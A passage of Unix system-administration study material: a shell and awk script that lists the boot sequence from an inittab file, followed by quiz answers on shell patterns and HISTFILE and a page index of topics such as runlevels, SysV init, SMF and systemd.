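            } else if ($3 == "once" || $3 == "wait" || $3 == "respawn") {
                n++; levels[n] = $2; cmd[n] = proc
            }
            # ctrlaltdel, powerfail, powerokwait and similar actions are
            # skipped: they run only when their event occurs.
        }
        END {
            for (i = 1; i <= ns; i++) print sysinit[i]
            for (i = 1; i <= nb; i++) print boot[i]
            for (i = 1; i <= n; i++)
                if (def != "" && index(levels[i], def)) print cmd[i]
        }
    ' "$1"
}

# write_sample_inittab FILE: abridged, constructed copy of the listing above.
write_sample_inittab() {
    cat > "$1" <<'EOF'
id:3:initdefault:
# System initialization.
si::sysinit:/etc/rc.d/rc.sysinit
x0:0:wait:/etc/rc.d/rc 0
x3:3:wait:/etc/rc.d/rc 3
x5:5:wait:/etc/rc.d/rc 5
# Trap CTRL-ALT-DELETE
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
pf::powerfail:/sbin/shutdown -f -h +2 "Power Failure; System Shutting Down"
pr:12345:powerokwait:/sbin/shutdown -c "Power Restored; Shutdown Cancelled"
# Run gettys in standard runlevels
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
# Run xdm in runlevel 5
x:5:respawn:/etc/X11/prefdm -nodaemon
EOF
}

# Demo: number the boot sequence of the sample file.
demo_file=$(mktemp)
write_sample_inittab "$demo_file"
boot_sequence "$demo_file" | awk '{ printf "%d. %s\n", NR, $0 }'
rm -f "$demo_file"
```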
Answer: ls r??
Shell expansion and Patterns
? Matches exactly one character
?? Matches exactly two characters
Type the name of the BASH Shell command history logfile on a CentOS machine.
The following command typed inside of a BASH Shell will display the location of the logfile:
# echo $HISTFILE
System V: A Major common ancestor of many Unix systems released by AT&T in 1983. PAGE 5
Solaris page 6
Timedatectl page 19
truss -f -v "lstat,lstat64" ls -d /etc/passwd/ 2>&1 | grep "[amc]t = " used before Solaris 10 page 21
Which Command page 24 locate page 25 find page 26 mount page 27 recover a file page 27 df -h page 28
Kernel threads page 36, parent child relationships page 37, zombie process page 38 Solaris process list page 39
Process list fields page 40, Linux process list page 41, lsof page 43, /proc page 44
Init page 54, runlevels page 54, system 5 page 54, /etc/inittab page 55, /etc/rc.d/rc page 58, startup scripts
rc.sysinit and /etc/inittab page 59, chkconfig page 59, service mysvc start page 60, System V management commands
page 60, SysV drawbacks page 61, run level comparison page 62, Service Management Facility (SMF) page 62, svcs:
like chkconfig manages which services start at boot page 62, systemd page 63, system service management commands
page 64, systemctl page 64, init process runs after system startup page 68, getty page 68, shell initialization
page 69, Secure shell initialization page 69, Common shells page 70, shell features page 71, stdin, stdout, stderr
page 72, job control page 72, bg fg command page 73, sigkill, sighup, sigstop, sigterm, sigtstp, sigint page 74,
redirection page 74, expansion and patterns bash shell page 75, Command substitution page 77, Shell modes login vs
non-login page 78, histfile and histsize page 83, Scripting fundamentals page 85,